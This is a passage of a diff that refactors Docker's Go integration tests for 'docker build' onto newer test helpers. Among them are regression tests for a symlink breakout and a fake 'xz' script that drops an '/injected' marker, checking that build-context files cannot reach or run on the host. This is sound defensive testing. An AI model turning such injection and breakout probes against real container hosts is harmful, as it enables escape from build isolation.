/first ] + MAINTAINER docker`, "first": "test git data", }, true) - if err != nil { - c.Fatal(err) - } defer git.Close() - _, err = buildImageFromPath(name, git.RepoURL, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithContextPath(git.RepoURL)) + res := inspectField(c, name, "Author") if res != "docker" { c.Fatalf("Maintainer should be docker, got %s", res) @@ -4054,48 +3072,34 @@ func (s *DockerSuite) TestBuildFromGit(c *check.C) { func (s *DockerSuite) TestBuildFromGitWithContext(c *check.C) { name := "testbuildfromgit" - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "docker/Dockerfile": `FROM busybox ADD first /first RUN [ -f /first ] 
MAINTAINER docker`, "docker/first": "test git data", }, true) - if err != nil { - c.Fatal(err) - } defer git.Close() - u := fmt.Sprintf("%s#master:docker", git.RepoURL) - _, err = buildImageFromPath(name, u, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithContextPath(fmt.Sprintf("%s#master:docker", git.RepoURL))) + res := inspectField(c, name, "Author") if res != "docker" { c.Fatalf("Maintainer should be docker, got %s", res) } } -func (s *DockerSuite) TestBuildFromGitwithF(c *check.C) { +func (s *DockerSuite) TestBuildFromGitWithF(c *check.C) { name := "testbuildfromgitwithf" - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "myApp/myDockerfile": `FROM busybox RUN echo hi from Dockerfile`, }, true) - if err != nil { - c.Fatal(err) - } defer git.Close() - out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "myApp/myDockerfile", git.RepoURL) - if err != nil { - c.Fatalf("Error on build. 
Out: %s\nErr: %v", out, err) - } - - if !strings.Contains(out, "hi from Dockerfile") { - c.Fatalf("Missing expected output, got:\n%s", out) - } + buildImage(name, cli.WithFlags("-f", "myApp/myDockerfile"), build.WithContextPath(git.RepoURL)).Assert(c, icmd.Expected{ + Out: "hi from Dockerfile", + }) } func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) { @@ -4120,18 +3124,14 @@ func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) { c.Fatalf("failed to close tar archive: %v", err) } - server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{ "testT.tar": buffer, - }) - c.Assert(err, check.IsNil) - + })) defer server.Close() - _, err = buildImageFromPath(name, server.URL()+"/testT.tar", true) - c.Assert(err, check.IsNil) + cli.BuildCmd(c, name, build.WithContextPath(server.URL()+"/testT.tar")) res := inspectField(c, name, "Author") - if res != "docker" { c.Fatalf("Maintainer should be docker, got %s", res) } @@ -4139,24 +3139,17 @@ func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) { func (s *DockerSuite) TestBuildCleanupCmdOnEntrypoint(c *check.C) { name := "testbuildcmdcleanuponentrypoint" - if _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - CMD ["test"] - ENTRYPOINT ["echo"]`, - true); err != nil { - c.Fatal(err) - } - if _, err := buildImage(name, - fmt.Sprintf(`FROM %s - ENTRYPOINT ["cat"]`, name), - true); err != nil { - c.Fatal(err) - } + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + CMD ["test"] + ENTRYPOINT ["echo"]`)) + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM %s + ENTRYPOINT ["cat"]`, name))) + res := inspectField(c, name, "Config.Cmd") if res != "[]" { c.Fatalf("Cmd %s, expected nil", res) } - res = inspectField(c, name, "Config.Entrypoint") if expected := "[cat]"; res != expected { c.Fatalf("Entrypoint %s, expected %s", res, expected) @@ -4165,14 +3158,10 @@ 
func (s *DockerSuite) TestBuildCleanupCmdOnEntrypoint(c *check.C) { func (s *DockerSuite) TestBuildClearCmd(c *check.C) { name := "testbuildclearcmd" - _, err := buildImage(name, - `From `+minimalBaseImage()+` + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` ENTRYPOINT ["/bin/bash"] - CMD []`, - true) - if err != nil { - c.Fatal(err) - } + CMD []`)) + res := inspectFieldJSON(c, name, "Config.Cmd") if res != "[]" { c.Fatalf("Cmd %s, expected %s", res, "[]") @@ -4184,9 +3173,8 @@ func (s *DockerSuite) TestBuildEmptyCmd(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildemptycmd" - if _, err := buildImage(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM "+minimalBaseImage()+"\nMAINTAINER quux\n")) + res := inspectFieldJSON(c, name, "Config.Cmd") if res != "null" { c.Fatalf("Cmd %s, expected %s", res, "null") @@ -4195,43 +3183,31 @@ func (s *DockerSuite) TestBuildEmptyCmd(c *check.C) { func (s *DockerSuite) TestBuildOnBuildOutput(c *check.C) { name := "testbuildonbuildparent" - if _, err := buildImage(name, "FROM busybox\nONBUILD RUN echo foo\n", true); err != nil { - c.Fatal(err) - } - - _, out, err := buildImageWithOut(name, "FROM "+name+"\nMAINTAINER quux\n", true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nONBUILD RUN echo foo\n")) - if !strings.Contains(out, "# Executing 1 build trigger") { - c.Fatal("failed to find the build trigger output", out) - } + buildImage(name, build.WithDockerfile("FROM "+name+"\nMAINTAINER quux\n")).Assert(c, icmd.Expected{ + Out: "# Executing 1 build trigger", + }) } +// FIXME(vdemeester) should be a unit test func (s *DockerSuite) TestBuildInvalidTag(c *check.C) { - name := "abcd:" + stringutils.GenerateRandomAlphaOnlyString(200) - _, out, err := buildImageWithOut(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", 
true) - // if the error doesn't check for illegal tag name, or the image is built - // then this should fail - if !strings.Contains(out, "Error parsing reference") || strings.Contains(out, "Sending build context to Docker daemon") { - c.Fatalf("failed to stop before building. Error: %s, Output: %s", err, out) - } + name := "abcd:" + testutil.GenerateRandomAlphaOnlyString(200) + buildImage(name, build.WithDockerfile("FROM "+minimalBaseImage()+"\nMAINTAINER quux\n")).Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "invalid reference format", + }) } func (s *DockerSuite) TestBuildCmdShDashC(c *check.C) { name := "testbuildcmdshc" - if _, err := buildImage(name, "FROM busybox\nCMD echo cmd\n", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD echo cmd\n")) res := inspectFieldJSON(c, name, "Config.Cmd") - expected := `["/bin/sh","-c","echo cmd"]` - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = `["cmd","/S","/C","echo cmd"]` } - if res != expected { c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res) } @@ -4243,124 +3219,86 @@ func (s *DockerSuite) TestBuildCmdSpaces(c *check.C) { // the arg separator to make sure ["echo","hi"] and ["echo hi"] don't // look the same name := "testbuildcmdspaces" - var id1 string - var id2 string - var err error - if id1, err = buildImage(name, "FROM busybox\nCMD [\"echo hi\"]\n", true); err != nil { - c.Fatal(err) - } - - if id2, err = buildImage(name, "FROM busybox\nCMD [\"echo\", \"hi\"]\n", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD [\"echo hi\"]\n")) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD [\"echo\", \"hi\"]\n")) + id2 := getIDByName(c, name) if id1 == id2 { c.Fatal("Should not have resulted in the same CMD") } // Now do the same with ENTRYPOINT - if id1, err = buildImage(name, "FROM 
busybox\nENTRYPOINT [\"echo hi\"]\n", true); err != nil { - c.Fatal(err) - } - - if id2, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo\", \"hi\"]\n", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENTRYPOINT [\"echo hi\"]\n")) + id1 = getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENTRYPOINT [\"echo\", \"hi\"]\n")) + id2 = getIDByName(c, name) if id1 == id2 { c.Fatal("Should not have resulted in the same ENTRYPOINT") } - } func (s *DockerSuite) TestBuildCmdJSONNoShDashC(c *check.C) { name := "testbuildcmdjson" - if _, err := buildImage(name, "FROM busybox\nCMD [\"echo\", \"cmd\"]", true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD [\"echo\", \"cmd\"]")) res := inspectFieldJSON(c, name, "Config.Cmd") - expected := `["echo","cmd"]` - if res != expected { c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res) } - } -func (s *DockerSuite) TestBuildEntrypointInheritance(c *check.C) { - - if _, err := buildImage("parent", ` +func (s *DockerSuite) TestBuildEntrypointCanBeOverriddenByChild(c *check.C) { + buildImageSuccessfully(c, "parent", build.WithDockerfile(` FROM busybox ENTRYPOINT exit 130 - `, true); err != nil { - c.Fatal(err) - } + `)) - if _, status, _ := dockerCmdWithError("run", "parent"); status != 130 { - c.Fatalf("expected exit code 130 but received %d", status) - } + icmd.RunCommand(dockerBinary, "run", "parent").Assert(c, icmd.Expected{ + ExitCode: 130, + }) - if _, err := buildImage("child", ` + buildImageSuccessfully(c, "child", build.WithDockerfile(` FROM parent ENTRYPOINT exit 5 - `, true); err != nil { - c.Fatal(err) - } - - if _, status, _ := dockerCmdWithError("run", "child"); status != 5 { - c.Fatalf("expected exit code 5 but received %d", status) - } + `)) + icmd.RunCommand(dockerBinary, "run", "child").Assert(c, icmd.Expected{ + ExitCode: 5, + }) } -func (s 
*DockerSuite) TestBuildEntrypointInheritanceInspect(c *check.C) { +func (s *DockerSuite) TestBuildEntrypointCanBeOverriddenByChildInspect(c *check.C) { var ( name = "testbuildepinherit" name2 = "testbuildepinherit2" expected = `["/bin/sh","-c","echo quux"]` ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = `["cmd","/S","/C","echo quux"]` } - if _, err := buildImage(name, "FROM busybox\nENTRYPOINT /foo/bar", true); err != nil { - c.Fatal(err) - } - - if _, err := buildImage(name2, fmt.Sprintf("FROM %s\nENTRYPOINT echo quux", name), true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENTRYPOINT /foo/bar")) + buildImageSuccessfully(c, name2, build.WithDockerfile(fmt.Sprintf("FROM %s\nENTRYPOINT echo quux", name))) res := inspectFieldJSON(c, name2, "Config.Entrypoint") - if res != expected { c.Fatalf("Expected value %s not in Config.Entrypoint: %s", expected, res) } - out, _ := dockerCmd(c, "run", name2) - - expected = "quux" - - if strings.TrimSpace(out) != expected { - c.Fatalf("Expected output is %s, got %s", expected, out) - } - + icmd.RunCommand(dockerBinary, "run", name2).Assert(c, icmd.Expected{ + Out: "quux", + }) } func (s *DockerSuite) TestBuildRunShEntrypoint(c *check.C) { name := "testbuildentrypoint" - _, err := buildImage(name, - `FROM busybox - ENTRYPOINT echo`, - true) - if err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + ENTRYPOINT echo`)) dockerCmd(c, "run", "--rm", name) } @@ -4368,7 +3306,7 @@ func (s *DockerSuite) TestBuildExoticShellInterpolation(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildexoticshellinterpolation" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV SOME_VAR a.b.c @@ -4386,11 +3324,7 @@ func (s *DockerSuite) TestBuildExoticShellInterpolation(c *check.C) { RUN [ "${SOME_VAR:+Version: ${SOME_VAR}}" = 'Version: a.b.c' ] 
RUN [ "${SOME_UNSET_VAR:+${SOME_VAR}}" = '' ] RUN [ "${SOME_UNSET_VAR:-${SOME_VAR:-d.e.f}}" = 'a.b.c' ] - `, false) - if err != nil { - c.Fatal(err) - } - + `)) } func (s *DockerSuite) TestBuildVerifySingleQuoteFails(c *check.C) { @@ -4400,53 +3334,40 @@ func (s *DockerSuite) TestBuildVerifySingleQuoteFails(c *check.C) { // as a "string" instead of "JSON array" and pass it on to "sh -c" and // it should barf on it. name := "testbuildsinglequotefails" - - if _, err := buildImage(name, - `FROM busybox - CMD [ '/bin/sh', '-c', 'echo hi' ]`, - true); err != nil { - c.Fatal(err) + expectedExitCode := 2 + if testEnv.OSType == "windows" { + expectedExitCode = 127 } - if _, _, err := dockerCmdWithError("run", "--rm", name); err == nil { - c.Fatal("The image was not supposed to be able to run") - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + CMD [ '/bin/sh', '-c', 'echo hi' ]`)) + icmd.RunCommand(dockerBinary, "run", "--rm", name).Assert(c, icmd.Expected{ + ExitCode: expectedExitCode, + }) } func (s *DockerSuite) TestBuildVerboseOut(c *check.C) { name := "testbuildverboseout" expected := "\n123\n" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = "\n123\r\n" } - _, out, err := buildImageWithOut(name, - `FROM busybox -RUN echo 123`, - false) - - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, expected) { - c.Fatalf("Output should contain %q: %q", "123", out) - } - + buildImage(name, build.WithDockerfile(`FROM busybox +RUN echo 123`)).Assert(c, icmd.Expected{ + Out: expected, + }) } func (s *DockerSuite) TestBuildWithTabs(c *check.C) { name := "testbuildwithtabs" - _, err := buildImage(name, - "FROM busybox\nRUN echo\tone\t\ttwo", true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nRUN echo\tone\t\ttwo")) res := inspectFieldJSON(c, name, "ContainerConfig.Cmd") expected1 := `["/bin/sh","-c","echo\tone\t\ttwo"]` expected2 := 
`["/bin/sh","-c","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected1 = `["cmd","/S","/C","echo\tone\t\ttwo"]` expected2 = `["cmd","/S","/C","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates } @@ -4458,14 +3379,9 @@ func (s *DockerSuite) TestBuildWithTabs(c *check.C) { func (s *DockerSuite) TestBuildLabels(c *check.C) { name := "testbuildlabel" expected := `{"License":"GPL","Vendor":"Acme"}` - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox LABEL Vendor=Acme - LABEL License GPL`, - true) - if err != nil { - c.Fatal(err) - } + LABEL License GPL`)) res := inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -4475,221 +3391,214 @@ func (s *DockerSuite) TestBuildLabels(c *check.C) { func (s *DockerSuite) TestBuildLabelsCache(c *check.C) { name := "testbuildlabelcache" - id1, err := buildImage(name, - `FROM busybox - LABEL Vendor=Acme`, false) - if err != nil { - c.Fatalf("Build 1 should have worked: %v", err) - } - - id2, err := buildImage(name, - `FROM busybox - LABEL Vendor=Acme`, true) - if err != nil || id1 != id2 { - c.Fatalf("Build 2 should have worked & used cache(%s,%s): %v", id1, id2, err) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL Vendor=Acme`)) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL Vendor=Acme`)) + id2 := getIDByName(c, name) + if id1 != id2 { + c.Fatalf("Build 2 should have worked & used cache(%s,%s)", id1, id2) } - id2, err = buildImage(name, - `FROM busybox - LABEL Vendor=Acme1`, true) - if err != nil || id1 == id2 { - c.Fatalf("Build 3 should have worked & NOT used cache(%s,%s): %v", id1, id2, err) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL 
Vendor=Acme1`)) + id2 = getIDByName(c, name) + if id1 == id2 { + c.Fatalf("Build 3 should have worked & NOT used cache(%s,%s)", id1, id2) } - id2, err = buildImage(name, - `FROM busybox - LABEL Vendor Acme`, true) // Note: " " and "=" should be same - if err != nil || id1 != id2 { - c.Fatalf("Build 4 should have worked & used cache(%s,%s): %v", id1, id2, err) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL Vendor Acme`)) + id2 = getIDByName(c, name) + if id1 != id2 { + c.Fatalf("Build 4 should have worked & used cache(%s,%s)", id1, id2) } // Now make sure the cache isn't used by mistake - id1, err = buildImage(name, - `FROM busybox - LABEL f1=b1 f2=b2`, false) - if err != nil { - c.Fatalf("Build 5 should have worked: %q", err) - } + buildImageSuccessfully(c, name, build.WithoutCache, build.WithDockerfile(`FROM busybox + LABEL f1=b1 f2=b2`)) - id2, err = buildImage(name, - `FROM busybox - LABEL f1="b1 f2=b2"`, true) - if err != nil || id1 == id2 { - c.Fatalf("Build 6 should have worked & NOT used the cache(%s,%s): %q", id1, id2, err) + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + LABEL f1=b1 f2=b2`)) + id2 = getIDByName(c, name) + if id1 == id2 { + c.Fatalf("Build 6 should have worked & NOT used the cache(%s,%s)", id1, id2) } } +// FIXME(vdemeester) port to docker/cli e2e tests (api tests should test suppressOutput option though) func (s *DockerSuite) TestBuildNotVerboseSuccess(c *check.C) { // This test makes sure that -q works correctly when build is successful: // stdout has only the image ID (long image ID) and stderr is empty. 
- var stdout, stderr string - var err error outRegexp := regexp.MustCompile("^(sha256:|)[a-z0-9]{64}\\n$") + buildFlags := cli.WithFlags("-q") tt := []struct { Name string - BuildFunc func(string) + BuildFunc func(string) *icmd.Result }{ { Name: "quiet_build_stdin_success", - BuildFunc: func(name string) { - _, stdout, stderr, err = buildImageWithStdoutStderr(name, "FROM busybox", true, "-q", "--force-rm", "--rm") + BuildFunc: func(name string) *icmd.Result { + return buildImage(name, buildFlags, build.WithDockerfile("FROM busybox")) }, }, { Name: "quiet_build_ctx_success", - BuildFunc: func(name string) { - ctx, err := fakeContext("FROM busybox", map[string]string{ - "quiet_build_success_fctx": "test", - }) - if err != nil { - c.Fatalf("Failed to create context: %s", err.Error()) - } - defer ctx.Close() - _, stdout, stderr, err = buildImageFromContextWithStdoutStderr(name, ctx, true, "-q", "--force-rm", "--rm") + BuildFunc: func(name string) *icmd.Result { + return buildImage(name, buildFlags, build.WithBuildContext(c, + build.WithFile("Dockerfile", "FROM busybox"), + build.WithFile("quiet_build_success_fctx", "test"), + )) }, }, { Name: "quiet_build_git_success", - BuildFunc: func(name string) { - git, err := newFakeGit("repo", map[string]string{ + BuildFunc: func(name string) *icmd.Result { + git := fakegit.New(c, "repo", map[string]string{ "Dockerfile": "FROM busybox", }, true) - if err != nil { - c.Fatalf("Failed to create the git repo: %s", err.Error()) - } - defer git.Close() - _, stdout, stderr, err = buildImageFromGitWithStdoutStderr(name, git, true, "-q", "--force-rm", "--rm") - + return buildImage(name, buildFlags, build.WithContextPath(git.RepoURL)) }, }, } for _, te := range tt { - te.BuildFunc(te.Name) - if err != nil { - c.Fatalf("Test %s shouldn't fail, but got the following error: %s", te.Name, err.Error()) - } - if outRegexp.Find([]byte(stdout)) == nil { - c.Fatalf("Test %s expected stdout to match the [%v] regexp, but it is [%v]", te.Name, 
outRegexp, stdout) + result := te.BuildFunc(te.Name) + result.Assert(c, icmd.Success) + if outRegexp.Find([]byte(result.Stdout())) == nil { + c.Fatalf("Test %s expected stdout to match the [%v] regexp, but it is [%v]", te.Name, outRegexp, result.Stdout()) } - if stderr != "" { - c.Fatalf("Test %s expected stderr to be empty, but it is [%#v]", te.Name, stderr) + if result.Stderr() != "" { + c.Fatalf("Test %s expected stderr to be empty, but it is [%#v]", te.Name, result.Stderr()) } } } +// FIXME(vdemeester) migrate to docker/cli tests func (s *DockerSuite) TestBuildNotVerboseFailureWithNonExistImage(c *check.C) { // This test makes sure that -q works correctly when build fails by // comparing between the stderr output in quiet mode and in stdout // and stderr output in verbose mode testRequires(c, Network) testName := "quiet_build_not_exists_image" - buildCmd := "FROM busybox11" - _, _, qstderr, qerr := buildImageWithStdoutStderr(testName, buildCmd, false, "-q", "--force-rm", "--rm") - _, vstdout, vstderr, verr := buildImageWithStdoutStderr(testName, buildCmd, false, "--force-rm", "--rm") - if verr == nil || qerr == nil { - c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", testName)) - } - if qstderr != vstdout+vstderr { - c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", testName, qstderr, vstdout+vstderr)) + dockerfile := "FROM busybox11" + quietResult := buildImage(testName, cli.WithFlags("-q"), build.WithDockerfile(dockerfile)) + quietResult.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + result := buildImage(testName, build.WithDockerfile(dockerfile)) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + if quietResult.Stderr() != result.Combined() { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", testName, quietResult.Stderr(), result.Combined())) } } +// FIXME(vdemeester) migrate to docker/cli tests func (s *DockerSuite) 
TestBuildNotVerboseFailure(c *check.C) { // This test makes sure that -q works correctly when build fails by // comparing between the stderr output in quiet mode and in stdout // and stderr output in verbose mode - tt := []struct { - TestName string - BuildCmds string + testCases := []struct { + testName string + dockerfile string }{ {"quiet_build_no_from_at_the_beginning", "RUN whoami"}, {"quiet_build_unknown_instr", "FROMD busybox"}, } - for _, te := range tt { - _, _, qstderr, qerr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "-q", "--force-rm", "--rm") - _, vstdout, vstderr, verr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "--force-rm", "--rm") - if verr == nil || qerr == nil { - c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", te.TestName)) - } - if qstderr != vstdout+vstderr { - c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", te.TestName, qstderr, vstdout+vstderr)) + for _, tc := range testCases { + quietResult := buildImage(tc.testName, cli.WithFlags("-q"), build.WithDockerfile(tc.dockerfile)) + quietResult.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + result := buildImage(tc.testName, build.WithDockerfile(tc.dockerfile)) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + if quietResult.Stderr() != result.Combined() { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", tc.testName, quietResult.Stderr(), result.Combined())) } } } +// FIXME(vdemeester) migrate to docker/cli tests func (s *DockerSuite) TestBuildNotVerboseFailureRemote(c *check.C) { // This test ensures that when given a wrong URL, stderr in quiet mode and // stderr in verbose mode are identical. 
// TODO(vdemeester) with cobra, stdout has a carriage return too much so this test should not check stdout URL := "http://something.invalid" - Name := "quiet_build_wrong_remote" - _, _, qstderr, qerr := buildImageWithStdoutStderr(Name, "", false, "-q", "--force-rm", "--rm", URL) - _, _, vstderr, verr := buildImageWithStdoutStderr(Name, "", false, "--force-rm", "--rm", URL) - if qerr == nil || verr == nil { - c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", Name)) + name := "quiet_build_wrong_remote" + quietResult := buildImage(name, cli.WithFlags("-q"), build.WithContextPath(URL)) + quietResult.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + result := buildImage(name, build.WithContextPath(URL)) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + + // An error message should contain name server IP and port, like this: + // "dial tcp: lookup something.invalid on 172.29.128.11:53: no such host" + // The IP:port needs to be removed in order to not trigger a test failure + // when more than one nameserver is configured. + // While at it, also strip excessive newlines.
+ normalize := func(msg string) string { + return strings.TrimSpace(regexp.MustCompile("[1-9][0-9.]+:[0-9]+").ReplaceAllLiteralString(msg, "")) } - if qstderr != vstderr { - c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", Name, qstderr, vstderr)) + + if normalize(quietResult.Stderr()) != normalize(result.Combined()) { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", name, quietResult.Stderr(), result.Combined())) } } +// FIXME(vdemeester) migrate to docker/cli tests func (s *DockerSuite) TestBuildStderr(c *check.C) { // This test just makes sure that no non-error output goes // to stderr name := "testbuildstderr" - _, _, stderr, err := buildImageWithStdoutStderr(name, - "FROM busybox\nRUN echo one", true) - if err != nil { - c.Fatal(err) + result := buildImage(name, build.WithDockerfile("FROM busybox\nRUN echo one")) + result.Assert(c, icmd.Success) + + // Windows to non-Windows should have a security warning + if runtime.GOOS == "windows" && testEnv.OSType != "windows" && !strings.Contains(result.Stdout(), "SECURITY WARNING:") { + c.Fatalf("Stdout contains unexpected output: %q", result.Stdout()) } - if runtime.GOOS == "windows" && - daemonPlatform != "windows" { - // Windows to non-Windows should have a security warning - if !strings.Contains(stderr, "SECURITY WARNING:") { - c.Fatalf("Stderr contains unexpected output: %q", stderr) - } - } else { - // Other platform combinations should have no stderr written too - if stderr != "" { - c.Fatalf("Stderr should have been empty, instead it's: %q", stderr) - } + // Stderr should always be empty + if result.Stderr() != "" { + c.Fatalf("Stderr should have been empty, instead it's: %q", result.Stderr()) } } func (s *DockerSuite) TestBuildChownSingleFile(c *check.C) { - testRequires(c, UnixCli) // test uses chown: not available on windows - testRequires(c, DaemonIsLinux) + testRequires(c, 
UnixCli, DaemonIsLinux) // test uses chown: not available on windows name := "testbuildchownsinglefile" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox COPY test / RUN ls -l /test RUN [ $(ls -l /test | awk '{print $3":"$4}') = 'root:root' ] -`, map[string]string{ - "test": "test", - }) - if err != nil { - c.Fatal(err) - } +`), + fakecontext.WithFiles(map[string]string{ + "test": "test", + })) defer ctx.Close() if err := os.Chown(filepath.Join(ctx.Dir, "test"), 4242, 4242); err != nil { c.Fatal(err) } - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) } func (s *DockerSuite) TestBuildSymlinkBreakout(c *check.C) { @@ -4733,9 +3642,8 @@ func (s *DockerSuite) TestBuildSymlinkBreakout(c *check.C) { }) w.Close() f.Close() - if _, err := buildImageFromContext(name, fakeContextFromDir(ctx), false); err != nil { - c.Fatal(err) - } + + buildImageSuccessfully(c, name, build.WithoutCache, build.WithExternalBuildContext(fakecontext.New(c, ctx))) if _, err := os.Lstat(filepath.Join(tmpdir, "inject")); err == nil { c.Fatal("symlink breakout - inject") } else if !os.IsNotExist(err) { @@ -4749,28 +3657,16 @@ func (s *DockerSuite) TestBuildXZHost(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildxzhost" - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox ADD xz /usr/local/sbin/ RUN chmod 755 /usr/local/sbin/xz ADD test.xz / -RUN [ ! 
-e /injected ]`, - map[string]string{ - "test.xz": "\xfd\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00" + - "\x21\x01\x16\x00\x00\x00\x74\x2f\xe5\xa3\x01\x00\x3f\xfd" + - "\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00\x21", - "xz": "#!/bin/sh\ntouch /injected", - }) - - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - +RUN [ ! -e /injected ]`), + build.WithFile("test.xz", "\xfd\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00"+"\x21\x01\x16\x00\x00\x00\x74\x2f\xe5\xa3\x01\x00\x3f\xfd"+"\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00\x21"), + build.WithFile("xz", "#!/bin/sh\ntouch /injected"), + )) } func (s *DockerSuite) TestBuildVolumesRetainContents(c *check.C) { @@ -4783,26 +3679,18 @@ func (s *DockerSuite) TestBuildVolumesRetainContents(c *check.C) { volName = "/foo" ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volName = "C:/foo" } - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM busybox COPY content /foo/file VOLUME `+volName+` -CMD cat /foo/file`, - map[string]string{ - "content": expected, - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, false); err != nil { - c.Fatal(err) - } +CMD cat /foo/file`), + build.WithFile("content", expected), + )) out, _ := dockerCmd(c, "run", "--rm", name) if out != expected { @@ -4811,220 +3699,78 @@ CMD cat /foo/file`, } -func (s *DockerSuite) TestBuildRenamedDockerfile(c *check.C) { - - ctx, err := fakeContext(`FROM busybox - RUN echo from Dockerfile`, - map[string]string{ - "Dockerfile": "FROM busybox\nRUN echo from Dockerfile", - "files/Dockerfile": "FROM busybox\nRUN echo from files/Dockerfile", - "files/dFile": "FROM busybox\nRUN echo from files/dFile", - "dFile": "FROM busybox\nRUN echo from dFile", - "files/dFile2": "FROM busybox\nRUN echo 
